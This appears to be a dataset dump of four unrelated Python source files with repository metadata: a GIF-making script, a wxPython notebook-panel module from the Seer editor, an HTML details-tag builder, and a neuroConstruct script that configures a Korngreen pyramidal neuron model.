ea93677c84c5ab62840d8394d3daebe99f51d6e5
|
350480124d05030a64c0a9b500ea56370fa4532f
|
/giffer.py
|
1585fdee161aec9e2a6bb52d34c1cda9dfcfede9
|
[] |
no_license
|
achogovadze/public
|
aa4556aa05878946868a7885020739c672c79514
|
f341035379a39b26da65ad487b30400f909c1d07
|
refs/heads/main
| 2023-04-26T22:43:30.605479
| 2021-05-27T14:15:05
| 2021-05-27T14:15:05
| 371,396,462
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
import imageio
images = []
filenames = [
'1.png',
'1.png',
'1.png',
'2.png',
'2.png',
'2.png',
'3.png',
'3.png',
'3.png',
'4.png',
'4.png',
'4.png',
'5.png',
'5.png',
'5.png',
'6.png',
'6.png',
'6.png',
'7.png',
'7.png',
'7.png',
'8.png',
'8.png',
'8.png',
]
for filename in filenames:
images.append(imageio.imread(filename))
imageio.mimsave('movie.gif', images)
|
[
"alex@pulsar.ai"
] |
alex@pulsar.ai
|
4bb5fb7059095abf1ff71ac43d972b1760591690
|
eef4344b87418dffc152f5de7217308c28bda2d5
|
/sNotebook.py
|
ed5eb2162450db466b33e7f671d9fced0c660464
|
[] |
no_license
|
Thoshh/seer-editor
|
fa4ec715a0dfe6b939af1c4b896ed98848f1608f
|
6b95e6909360c153ef42c9ffd0b3b3efd92a3a65
|
refs/heads/master
| 2016-08-12T11:08:53.598525
| 2007-08-22T00:54:07
| 2007-08-22T00:54:07
| 55,092,422
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27,634
|
py
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# Initial code framework based from DrPython, Copyright 2003-2007 Daniel Pozmanter
# Distributed under the terms of the GPL (GNU Public License)
#
# Seer is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#The Notebook, and Panels.
import os.path
import wx
import wx.stc
from sText import sText
import sEncoding
#*************************************************
#Used in the main panel.
class sSashWindow(wx.SashWindow):
def __init__(self, parent, id, pos, size, style=0):
wx.SashWindow.__init__(self, parent, id, pos, size, style)
self.parent = parent.parent
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
def OnKeyDown(self, event):
self.parent.RunShortcuts(event)
def SetNotebook(self, notebook):
'''Can Only be called once'''
self.notebook = notebook
self.theSizer = wx.BoxSizer(wx.HORIZONTAL)
self.theSizer.Add(self.notebook, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.theSizer)
#*************************************************
#This is the main panel,
#Where all the sizing stuff happens.
class sMainPanel(wx.Panel):
def __init__(self, parent, id):
wx.Panel.__init__(self, parent, id)
self.panelsizesfile = parent.datdirectory + "/seer.panel.sizes.dat"
self.parent = parent
width, height = self.GetSizeTuple()
#Variables to Keep Track of what is being used.
self.ID_DOCUMENT = 6001
self.ID_PROMPT = 6002
self.ID_LEFT = 6003
self.ID_RIGHT = 6004
self.ID_TOP = 6005
self.PromptIsVisible = self.parent.prefs.promptisvisible
self.LeftIsVisible = False
self.RightIsVisible = False
self.TopIsVisible = False
self.documenttuple = (width, height)
self.prompttuple = (0, 0)
self.lefttuple = (0, 0)
self.righttuple = (0, 0)
self.toptuple = (0, 0)
self.promptsize = self.parent.prefs.promptsize
self.prompt = sSashWindow(self, self.ID_PROMPT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.prompt.SetSashVisible(wx.SASH_TOP, True)
self.prompt.SetSashBorder(wx.SASH_TOP, True)
self.document = sSashWindow(self, self.ID_DOCUMENT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.document.SetSashVisible(wx.SASH_BOTTOM, True)
self.document.SetSashBorder(wx.SASH_BOTTOM, True)
self.leftsize = self.parent.prefs.sidepanelleftsize
self.left = sSashWindow(self, self.ID_LEFT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.rightsize = self.parent.prefs.sidepanelrightsize
self.right = sSashWindow(self, self.ID_RIGHT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.topsize = self.parent.prefs.sidepaneltopsize
self.top = sSashWindow(self, self.ID_TOP, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.document.SetSashVisible(wx.SASH_LEFT, True)
self.document.SetSashBorder(wx.SASH_LEFT, True)
self.document.SetSashVisible(wx.SASH_RIGHT, True)
self.document.SetSashBorder(wx.SASH_RIGHT, True)
self.document.SetSashVisible(wx.SASH_TOP, True)
self.document.SetSashBorder(wx.SASH_TOP, True)
self.prompt.SetSashVisible(wx.SASH_LEFT, True)
self.prompt.SetSashBorder(wx.SASH_LEFT, True)
self.prompt.SetSashVisible(wx.SASH_RIGHT, True)
self.prompt.SetSashBorder(wx.SASH_RIGHT, True)
self.oldwidth, self.oldheight = 0, 0
self.leftNotebook = sSidePanelNotebook(self.left, -1, 0)
self.rightNotebook = sSidePanelNotebook(self.right, -1, 1)
self.topNotebook = sSidePanelNotebook(self.top, -1, 1)
self.left.SetNotebook(self.leftNotebook)
self.right.SetNotebook(self.rightNotebook)
self.top.SetNotebook(self.topNotebook)
self.lidx = []
self.ridx = []
self.tidx = []
self.OnSize(None)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_SASH_DRAGGED, self.OnSashDrag, id=self.ID_DOCUMENT)
self.Bind(wx.EVT_SASH_DRAGGED, self.OnSashDrag, id=self.ID_PROMPT)
def _getindex(self, Position, Index):
#Left
if Position == 0:
if Index in self.lidx:
Index = self.lidx.index(Index)
#Right
elif Position == 1:
if Index in self.ridx:
Index = self.ridx.index(Index)
#Top
else:
if Index in self.tidx:
Index = self.tidx.index(Index)
return Index
def ClosePanel(self, Position, Index):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
self.leftNotebook.DeletePage(Index)
self.lidx.pop(Index)
if self.leftNotebook.GetPageCount() < 1:
self.LeftIsVisible = False
#Right
elif Position == 1:
self.rightNotebook.DeletePage(Index)
self.ridx.pop(Index)
if self.rightNotebook.GetPageCount() < 1:
self.RightIsVisible = False
#Top
else:
self.topNotebook.DeletePage(Index)
self.tidx.pop(Index)
if self.topNotebook.GetPageCount() < 1:
self.TopIsVisible = False
wx.Yield()
self.OnSize(None)
def GetTargetNotebookPage(self, Position=1, Title=' '):
#Left
if Position == 0:
l = self.leftNotebook.GetPageCount()
self.lidx.append(l)
newpage = sSidePanel(self.leftNotebook, -1)
self.leftNotebook.AddPage(newpage, Title, True)
self.LeftIsVisible = True
#Right
elif Position == 1:
l = self.rightNotebook.GetPageCount()
self.ridx.append(l)
newpage = sSidePanel(self.rightNotebook, -1)
self.rightNotebook.AddPage(newpage, Title, True)
self.RightIsVisible = True
#Top
else:
l = self.topNotebook.GetPageCount()
self.tidx.append(l)
newpage = sSidePanel(self.topNotebook, -1)
self.topNotebook.AddPage(newpage, Title, True)
self.TopIsVisible = True
return newpage, l
def IsVisible(self, Position=1, Index=0):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
return (self.leftNotebook.GetSelection() == Index) and self.LeftIsVisible
#Right
elif Position == 1:
return (self.rightNotebook.GetSelection() == Index) and self.RightIsVisible
#Top
else:
return (self.topNotebook.GetSelection() == Index) and self.TopIsVisible
def MemorizePanelSizes(self):
if self.parent.prefs.rememberpanelsizes:
try:
f = file(self.panelsizesfile, 'wb')
f.write(str(self.promptsize) + '\n' + str(self.leftsize) + '\n' + str(self.rightsize) + '\n' + str(self.topsize))
f.close()
except:
self.parent.ShowMessage('Error Memorizing Panel Sizes.')
def OnSashDrag(self, event):
evtheight = event.GetDragRect().height
evtwidth = event.GetDragRect().width
width, height = self.GetSizeTuple()
if evtwidth < 0:
evtwidth = 0
elif evtwidth > width:
evtwidth = width
if event.GetDragStatus() == wx.SASH_STATUS_OUT_OF_RANGE:
if (not self.PromptIsVisible) or (evtheight < height):
evtheight = 0
else:
evtheight = height
elif evtheight > height:
evtheight = height
oldsize = self.promptsize
loldsize = self.leftsize
roldsize = self.rightsize
toldsize = self.topsize
#Edge Drag
e = event.GetId()
edge = event.GetEdge()
if edge == wx.SASH_LEFT:
self.leftsize = ((width*100) - (evtwidth*100)) / width
elif edge == wx.SASH_RIGHT:
self.rightsize = ((width*100) - (evtwidth*100)) / width
elif e == self.ID_DOCUMENT:
if edge == wx.SASH_BOTTOM:
self.promptsize = ((height*100) - (evtheight*100)) / height
self.documenttuple = (self.documenttuple[0], evtheight)
self.prompttuple = (self.prompttuple[0], height-evtheight)
elif edge == wx.SASH_TOP:
self.topsize = ((height*100) - (evtheight*100)) / height
elif e == self.ID_PROMPT:
self.promptsize = ((evtheight*100) / height)
#Prompt Is Visible
if self.promptsize == 0:
self.promptsize = oldsize
self.PromptIsVisible = False
elif not self.PromptIsVisible and self.prompttuple[1] > 0:
self.PromptIsVisible = True
#Left Is Visible
if self.leftsize == 0:
self.leftsize = loldsize
self.LeftIsVisible = False
elif not self.LeftIsVisible and self.lefttuple[0] > 0:
self.LeftIsVisible = True
#Right Is Visible
if self.rightsize == 0:
self.rightsize = roldsize
self.RightIsVisible = False
elif not self.RightIsVisible and self.righttuple[0] > 0:
self.RightIsVisible = True
#Top Is Visible
if self.topsize == 0:
self.topsize = toldsize
self.TopIsVisible = False
elif not self.TopIsVisible and self.toptuple[1] > 0:
self.TopIsVisible = True
self.OnSize(None)
def OnSize(self, event):
width, height = self.GetSizeTuple()
if (event is not None) and (width == self.oldwidth) and (height == self.oldheight):
return
self.oldwidth, self.oldheight = width, height
#Height
heightPrompt = 0
heightTop = 0
if self.TopIsVisible:
heightTop = (height * self.topsize) / 100
if self.PromptIsVisible:
heightPrompt = (height * self.promptsize) / 100
heightDocument = height - heightTop - heightPrompt
if heightPrompt != 100:
if heightDocument < 50:
if heightTop > 0:
heightTop = heightTop / 2
if heightPrompt > 0:
heightPrompt = heightPrompt / 2
heightDocument += heightTop + heightPrompt
#Width
widthLeft = 0
widthRight = 0
if self.LeftIsVisible:
widthLeft = (width * self.leftsize) / 100
if self.RightIsVisible:
widthRight = (width * self.rightsize) / 100
widthMain = width - widthLeft - widthRight
if widthMain < 50:
if widthLeft > 0:
widthLeft = widthLeft / 2
if widthRight > 0:
widthRight = widthRight / 2
widthMain += widthLeft + widthRight
#Tuples
self.documenttuple = (widthMain, heightDocument)
self.prompttuple = (widthMain, heightPrompt)
self.lefttuple = (widthLeft, height)
self.righttuple = (widthRight, height)
self.toptuple = (widthMain, heightTop)
#Set Move, Then Set Size
self.document.Move((widthLeft, heightTop))
self.prompt.Move((widthLeft, heightDocument+heightTop))
self.left.Move((0, 0))
self.right.Move((widthLeft+widthMain, 0))
self.top.Move((widthLeft, 0))
self.document.SetSize(self.documenttuple)
self.prompt.SetSize(self.prompttuple)
self.left.SetSize(self.lefttuple)
self.right.SetSize(self.righttuple)
self.top.SetSize(self.toptuple)
def RememberPanelSizes(self):
if self.parent.prefs.rememberpanelsizes:
if not os.path.exists(self.panelsizesfile):
return
try:
f = file(self.panelsizesfile, 'rb')
text = f.read()
f.close()
p, l, r, t = map(int, text.split('\n'))
self.promptsize = p
self.leftsize = l
self.rightsize = r
self.topsize = t
except:
self.parent.ShowMessage('Error Remembering Panel Sizes.\nThe File: "%s" may be corrupt.\nTry removing it, and restarting Seer.' % self.panelsizesfile)
def SetPanelSize(self, Position, size):
if Position == 0:
self.leftsize = size
elif Position == 1:
self.rightsize = size
else:
self.topsize = size
def ShowPanel(self, Position, Index, Show=True):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
self.LeftIsVisible = Show
if self.LeftIsVisible:
self.leftNotebook.SetSelection(Index)
self.leftNotebook.GetPage(Index).OnSize(None)
#Right
elif Position == 1:
self.RightIsVisible = Show
if self.RightIsVisible:
self.rightNotebook.SetSelection(Index)
self.rightNotebook.GetPage(Index).OnSize(None)
#Top
else:
self.TopIsVisible = Show
if self.TopIsVisible:
self.topNotebook.SetSelection(Index)
self.topNotebook.GetPage(Index).OnSize(None)
self.OnSize(None)
def TogglePanel(self, Position=1, Index=0):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
if not self.LeftIsVisible:
self.LeftIsVisible = True
self.leftNotebook.SetSelection(Index)
else:
self.LeftIsVisible = False
#Right
elif Position == 1:
if not self.RightIsVisible:
self.RightIsVisible = True
self.rightNotebook.SetSelection(Index)
else:
self.RightIsVisible = False
#Top
else:
if not self.TopIsVisible:
self.TopIsVisible = True
self.topNotebook.SetSelection(Index)
else:
self.TopIsVisible = False
self.OnSize(None)
#*************************************************
def _refresh(x):
x.Refresh()
#*******************************************************************************************************
#Notebook base class
class sNotebook(wx.Notebook):
def __init__(self, parent, id, images, closefunction):
wx.Notebook.__init__(self, parent, id, wx.DefaultPosition, wx.Size(-1, -1), wx.CLIP_CHILDREN)
self.parent = parent
self.grandparent = parent.parent
self.closefunction = closefunction
if images:
imagesize = (16, 16)
self.imagelist = wx.ImageList(imagesize[0], imagesize[1])
self.images = images
map(self.imagelist.Add, self.images)
self.AssignImageList(self.imagelist)
#wxPython bug workaround, OldSelection doesn't work.
self.oldselection = 0
def OnLeftDoubleClick(self, event):
if self.grandparent.prefs.doubleclicktoclosetab:
self.closefunction(None)
#*************************************************
#Document Notebook
class sDocNotebook(sNotebook):
def __init__(self, parent, id):
grandparent = parent.parent
images = [wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/unmodified.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/modified.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active unmodified.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active modified.png", wx.BITMAP_TYPE_PNG))]
sNotebook.__init__(self, parent, id, images, grandparent.OnClose)
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnPopUp)
self.Bind(wx.EVT_LEFT_UP, self.OnSelectTab)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDoubleClick)
def OnPageChanged(self, event):
if not self.grandparent.txtDocumentArray:
if event is not None:
event.Skip()
return
if event is not None:
i = event.GetSelection()
else:
i = self.GetSelection()
l = self.GetPageCount()
if (i < 0) or (i >= l):
if event is not None:
event.Skip()
return
if self.oldselection < l:
self.grandparent.txtDocumentArray[self.oldselection].IsActive = False
self.grandparent.txtDocumentArray[self.oldselection].OnModified(None)
self.oldselection = i
self.grandparent.txtDocumentArray[i].IsActive = True
self.grandparent.txtDocumentArray[i].OnModified(None)
if event is not None:
event.Skip()
def OnPopUp(self, event):
tabmenu = wx.Menu()
tabmenu.Append(self.grandparent.ID_CLOSE, "&Close")
tabmenu.Append(self.grandparent.ID_CLOSE_ALL, "Close &All Tabs")
tabmenu.Append(self.grandparent.ID_CLOSE_ALL_OTHER_DOCUMENTS, "Close All &Other Tabs")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_NEXT_DOCUMENT, "Next Tab")
tabmenu.Append(self.grandparent.ID_PREVIOUS_DOCUMENT, "Previous Tab")
tabmenu.Append(self.grandparent.ID_FIRST_DOCUMENT, "First Tab")
tabmenu.Append(self.grandparent.ID_LAST_DOCUMENT, "Last Tab")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_RELOAD, "&Reload File")
tabmenu.Append(self.grandparent.ID_RESTORE_FROM_BACKUP, "&Restore From Backup")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_SAVE, "&Save")
tabmenu.Append(self.grandparent.ID_SAVE_AS, "Save &As...")
ht = self.HitTest(event.GetPosition())[0]
if ht > -1:
self.SetSelection(ht)
self.SetTab()
tabmenu.Enable(self.grandparent.ID_RELOAD, len(self.grandparent.txtDocument.filename) > 0)
tabmenu.Enable(self.grandparent.ID_RESTORE_FROM_BACKUP, len(self.grandparent.txtDocument.filename) > 0)
self.PopupMenu(tabmenu, event.GetPosition())
tabmenu.Destroy()
def OnSelectTab(self, event):
selection = self.GetSelection()
if selection != self.grandparent.docPosition:
self.SetTab()
event.Skip()
def SetTab(self):
selection = self.GetSelection()
if selection != -1:
self.grandparent.setDocumentTo(selection)
#*************************************************
#Prompt Notebook
class sPromptNotebook(sNotebook):
def __init__(self, parent, id):
grandparent = parent.parent
images = [wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/not running.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/running.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active not running.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active running.png", wx.BITMAP_TYPE_PNG))]
sNotebook.__init__(self, parent, id, images, grandparent.OnClosePrompt)
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_LEFT_UP, self.OnSelectTab)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDoubleClick)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnPopUp)
def OnPageChanged(self, event):
if not self.grandparent.txtPromptArray:
if event is not None:
event.Skip()
return
if event is not None:
i = event.GetSelection()
else:
i = self.GetSelection()
l = self.GetPageCount()
if (i < 0) or (i >= l):
if event is not None:
event.Skip()
return
if self.oldselection < l:
if self.grandparent.txtPromptArray[self.oldselection].pid > -1:
self.SetPageImage(self.oldselection, 1)
else:
self.SetPageImage(self.oldselection, 0)
self.oldselection = i
if self.grandparent.txtPromptArray[i].pid > -1:
self.SetPageImage(i, 3)
else:
self.SetPageImage(i, 2)
if event is not None:
event.Skip()
def OnSelectTab(self, event):
selection = self.GetSelection()
if selection != self.grandparent.promptPosition:
self.SetTab()
event.Skip()
def SetTab(self):
selection = self.GetSelection()
if selection != -1:
self.grandparent.setPromptTo(selection)
def OnPopUp(self, event):
tabmenu = wx.Menu()
tabmenu.Append(self.grandparent.ID_CLOSE_PROMPT, "&Close Prompt")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_PYTHON, "&Python")
tabmenu.Append(self.grandparent.ID_RUN, "&Run Current Document")
tabmenu.Append(self.grandparent.ID_END, "&End")
ht = self.HitTest(event.GetPosition())[0]
if ht > -1:
self.SetSelection(ht)
self.SetTab()
tabmenu.Enable(self.grandparent.ID_RUN, (len(self.grandparent.txtDocument.filename) > 0))
tabmenu.Enable(self.grandparent.ID_END, (self.grandparent.txtPrompt.pid > -1))
self.PopupMenu(tabmenu, event.GetPosition())
tabmenu.Destroy()
#*************************************************
#Notebook to be used in the side panels.
class sSidePanelNotebook(sNotebook):
def __init__(self, parent, id, Position):
self.parent = parent.parent
self.PanelPosition = Position
self.ID_CLOSE = 50
sNotebook.__init__(self, parent, id, [], self.OnClose)
self.grandparent = self.GetParent().GetParent()
self.Bind(wx.EVT_MENU, self.OnClose, id=self.ID_CLOSE)
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDoubleClick)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnPopUp)
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnClose(self, event):
if self.GetPageCount() > 0:
self.grandparent.ClosePanel(self.PanelPosition, self.GetSelection())
self.grandparent.OnSize(None)
def OnPageChanged(self, event):
sel = self.GetSelection()
if sel > -1:
self.GetPage(sel).OnSize(None)
event.Skip()
def OnSize(self, event):
if event is not None:
if self.GetPageCount() > 0:
self.GetPage(self.GetSelection()).SetSize(self.GetSize())
event.Skip()
def OnPopUp(self, event):
tabmenu = wx.Menu()
tabmenu.Append(self.ID_CLOSE, "&Close Panel")
ht = self.HitTest(event.GetPosition())[0]
if ht > -1:
self.SetSelection(ht)
self.PopupMenu(tabmenu, event.GetPosition())
tabmenu.Destroy()
#*************************************************
#Panel class for panels with a single stc.
class sPanel(wx.Panel):
def __init__(self, parent, id):
wx.Panel.__init__(self, parent, id)
self.grandparent = parent.GetGrandParent()
self.stc = None
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
def OnKeyDown(self, event):
self.grandparent.GetParent().RunShortcuts(event)
def OnSize(self, event):
if self.stc is not None:
self.stc.SetSize(self.GetSize())
if event is not None:
event.Skip()
def SetSTC(self, stc):
self.stc = stc
#*************************************************
#Panel class for side panels.
class sSidePanel(wx.Panel):
def __init__(self, parent, id):
wx.Panel.__init__(self, parent, id)
self.panel = None
self.parent = parent
self.grandparent = parent.GetGrandParent()
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnSize(self, event):
if self.panel is not None:
self.panel.SetSize(self.GetSize())
if event is not None:
event.Skip()
def OnKeyDown(self, event):
self.grandparent.GetParent().RunShortcuts(event)
def SetPanel(self, panel):
self.panel = panel
#*************************************************
#View In Panel
class sSplitTextPanel(wx.Panel):
def __init__(self, parent, grandparent, targetstc, position, index):
docid = grandparent.txtDocument.GetId()
wx.Panel.__init__(self, parent, docid)
ID_CLOSE = grandparent.GetNewId()
self.position = position
self.index = index
self.parent = parent
self.grandparent = grandparent
if docid == targetstc.GetId():
sv = -1
else:
sv = 1
self.txtDoc = sText(self, docid, grandparent, SplitView=sv)
self.txtDoc.SetupPrefsDocument()
self.txtDoc.SetDocPointer(targetstc.GetDocPointer())
self.txtDoc.GotoPos(targetstc.GetCurrentPos())
self.txtDoc.ScrollToLine(targetstc.GetCurrentLine())
self.label = wx.TextCtrl(self, -1, " Viewing: " + targetstc.GetFilenameTitle(), size=(150, -1), style=wx.TE_READONLY)
self.btnClose = wx.Button(self, ID_CLOSE, "Close")
self.topSizer = wx.BoxSizer(wx.HORIZONTAL)
self.theSizer = wx.BoxSizer(wx.VERTICAL)
self.topSizer.Add(self.label, 1, wx.EXPAND)
self.topSizer.Add(self.btnClose, 0, wx.SHAPED | wx.ALIGN_RIGHT)
self.theSizer.Add(self.topSizer, 0, wx.EXPAND)
self.theSizer.Add(self.txtDoc, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.theSizer)
text = self.txtDoc.GetText()
#Scrolling
bufferstring = sEncoding.EncodeText(self.grandparent, '000', self.txtDoc.GetEncoding())
lines = text.split(self.txtDoc.GetEndOfLineCharacter())
spaces = "\t".expandtabs(self.grandparent.prefs.doctabwidth[self.txtDoc.filetype])
line = ""
length = 0
for l in lines:
if len(l) > length:
length = len(l)
line = l
line = line.replace('\t', spaces)
self.txtDoc.SetScrollWidth(self.txtDoc.TextWidth(wx.stc.STC_STYLE_DEFAULT, line + bufferstring))
self.txtDoc.SetXOffset(0)
#/End Scrolling
self.Bind(wx.EVT_BUTTON, self.OnbtnClose, id=ID_CLOSE)
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
def OnbtnClose(self, event):
self.grandparent.mainpanel.ClosePanel(self.position, self.index)
def OnKeyDown(self, event):
self.grandparent.RunShortcuts(event)
|
[
"verbena1@d10d4a45-7336-0410-a5b7-655e53db1087"
] |
verbena1@d10d4a45-7336-0410-a5b7-655e53db1087
|
858d39bf587b28bb367e48d73d10a0af61bec0d9
|
280fd34615d5df47f17e423d195fc7d8947c3bec
|
/korona/html/tags/details.py
|
ee4430d664956375bfe4f369fa9f825f176f0c85
|
[
"MIT"
] |
permissive
|
bharadwajyarlagadda/korona
|
051b9ed0c3fd7cb0d7eaa77cfafdee668c078c78
|
ee4662b6a29907495e31ed2581dc5484bb03eadc
|
refs/heads/master
| 2023-01-19T08:15:09.546701
| 2016-09-29T20:45:56
| 2016-09-29T20:45:56
| 65,955,404
| 2
| 1
|
NOASSERTION
| 2022-12-26T20:27:38
| 2016-08-18T01:41:37
|
Python
|
UTF-8
|
Python
| false
| false
| 728
|
py
|
# -*- coding: utf-8 -*-
"""Module for constructing <details> tag."""
from __future__ import absolute_import
from ...templates.html.tags import details
class Details(object):
"""Class for constructing details tag.
Args:
open (bool): Specifies that the details should be visible (open) to
the user.
text (str): Specifies the details text. (As in
<details>{text}</details>)
.. versionadded:: 0.2.0
"""
def __init__(self, open=False, text=None):
self.tag = 'details'
self.values = {'open': open, 'text': text}
def construct(self):
"""Returns the constructed details tag <details></details>."""
return details.render(self.values)
|
[
"yarlagaddabharadwaj@gmail.com"
] |
yarlagaddabharadwaj@gmail.com
|
632c1950978a9b52b8c84997b63de3a8a3fe035b
|
88f3fc1a75dad865e9e0f9c4688370fa213b2939
|
/NEURON/create_nc_cell.py
|
ce2b82bf3e803952190d7c5d6c82aaaaa05efb59
|
[] |
no_license
|
OpenSourceBrain/korngreen-pyramidal
|
87dce9f2f509f93f955e6c9976440f02935ef2af
|
79a2354c377bd405bc3467ee5bf700c4dd15b73a
|
refs/heads/master
| 2021-07-10T08:32:45.485875
| 2021-03-10T09:16:35
| 2021-03-10T09:16:35
| 13,787,127
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,633
|
py
|
# utility script for setting model parameters for the Korngreen model
# from .params files, via neuroConstruct
import rlcompleter, readline
readline.parse_and_bind('tab: complete')
from java.io import File
from java.util import ArrayList
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.utils.equation import Variable
from ucl.physiol.neuroconstruct.cell import VariableParameter, VariableMechanism, ChannelMechanism, IonProperties, ParameterisedGroup
from korngreen_utils import AlmogKorngreenPars, Mechanism
class NCProject(object):
def __init__(self, fname):
self._project = self.load_project(fname)
def load_project(self, fname):
file = File(fname)
print 'Loading project file: ', file.getAbsolutePath()
pm = ProjectManager()
project = pm.loadProject(file)
print pm.status()
return project
def add_cell(self, cell):
self._project.cellManager.addCellType(k.cell)
def get_cell(self, name):
return self._project.cellManager.getCell(name)
def save(self):
self._project.markProjectAsEdited()
self._project.saveProject()
class KorngreenCell(object):
def __init__(self, parsname):
self._pars = AlmogKorngreenPars()
self._pars.pars_from_file(parsname)
def create_from_passive(self, pascell, name='test'):
cell = pascell.clone()
cell.setInstanceName(name)
self._cell = cell
def clear_groups(self):
for sec in self._cell.allSections:
groups = sec.getGroups().clone()
for g in groups:
sec.removeFromGroup(g)
def add_groups(self):
for sec in self._cell.allSections:
if not 'all' in sec.getGroups():
sec.addToGroup('all')
for pat,gname in {'dend':'basal_dend_group', 'apic':'apical_dend_group', 'soma':'soma_group', 'iseg':'iseg_group', 'myelin':'myelin_group', 'hill':'hill_group', 'node':'nodes_group'}.iteritems():
if pat in sec.getSectionName():
sec.addToGroup(gname)
@property
def groups(self):
return self._cell.getAllGroupNames()
@property
def parametrized_groups(self):
return self._cell.getParameterisedGroups()
@property
def cell(self):
return self._cell
def create_apical_parametrized_group(self):
#assuming that there is only one group with "apic" in the name!
pname = 'p'
pg = ParameterisedGroup('PathLengthApicalDends', 'apical_dend_group', ParameterisedGroup.Metric.PATH_LENGTH_FROM_ROOT, ParameterisedGroup.ProximalPref.NO_TRANSLATION, ParameterisedGroup.DistalPref.NO_NORMALISATION, pname)
self._cell.getParameterisedGroups().add(pg);
return pg
def add_inhomogeneous_mechanisms(self, mod=False):
pg = self.create_apical_parametrized_group()
for mech in self._pars.inhomogeneous_mechs:
if 'ca' in mech.name:
par = 'permeability'
else:
par = 'gmax'
if mod:
mech.name += '_mod'
vp = VariableParameter(par, mech.expr, Variable(pg.getVariable()), ArrayList())
vm = VariableMechanism(mech.name, vp)
for epname, epval in mech.extra_parameters.iteritems():
print 'extra par: ', epname, epval
vm.setExtraParam(epname, epval)
self._cell.associateParamGroupWithVarMech(pg, vm)
def add_mechanisms_to_group(self, group_name, list_mechs, mod=False):
for m in list_mechs:
name = m.name
val = m.gmax
if mod:
name += '_mod'
cm = ChannelMechanism(name, val)
for epname, epval in m.extra_parameters.iteritems():
cm.setExtraParam(epname, epval)
self._cell.associateGroupWithChanMech(group_name, cm)
def add_homogeneous_mechanisms(self, mod=False):
self.add_mechanisms_to_group('soma_group', self._pars.soma_group.mechanisms, mod)
self.add_mechanisms_to_group('hill_group', self._pars.hill_group.mechanisms, mod)
self.add_mechanisms_to_group('iseg_group', self._pars.iseg_group.mechanisms, mod)
self.add_mechanisms_to_group('nodes_group', self._pars.node_group.mechanisms, mod)
self.add_mechanisms_to_group('myelin_group', self._pars.myelin_group.mechanisms, mod)
self.add_mechanisms_to_group('basal_dend_group', self._pars.basal_dend_group.mechanisms, mod)
self.add_mechanisms_to_group('all', [Mechanism('cad', 0)])
def add_ion_properties(self):
self._cell.associateGroupWithIonProperties('all', IonProperties('na', self._pars.Ena))
self._cell.associateGroupWithIonProperties('all', IonProperties('k', self._pars.Ek))
self._cell.associateGroupWithIonProperties('all', IonProperties('ca', self._pars.cai, self._pars.cao))
for g in ['apical_dend_group', 'basal_dend_group', 'soma_group']:
self._cell.associateGroupWithIonProperties(g, IonProperties('h', -33.0))
if __name__ == '__main__':
proj = NCProject("../neuroConstruct/KorngreenPyramidal.ncx")
k = KorngreenCell("best.params")
#k.create_from_passive(proj.get_cell('A140612_pas'), 'A140612_nml')
k.create_from_passive(proj.get_cell('A140612_pas'), 'test')
#k.clear_groups()
k.add_groups()
